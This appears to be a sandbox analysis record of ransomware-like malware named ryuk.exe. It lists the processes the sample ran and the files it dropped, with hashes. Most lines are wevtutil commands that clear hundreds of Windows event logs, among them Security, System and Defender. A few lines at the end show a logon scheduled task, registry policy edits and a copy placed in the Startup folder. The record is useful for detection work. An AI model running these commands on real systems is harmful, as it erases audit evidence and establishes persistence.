C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sens/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TunnelDriver"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Power"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Render"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ntshrui"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "OAlerts"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Security"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Setup"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "System"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "TabletPC_InputPanel_Channel"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "WMPSetup"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "WMPSyncEngine"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "Windows PowerShell"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl "muxencode"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

Network

N/A

Files

C:\ProgramData\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
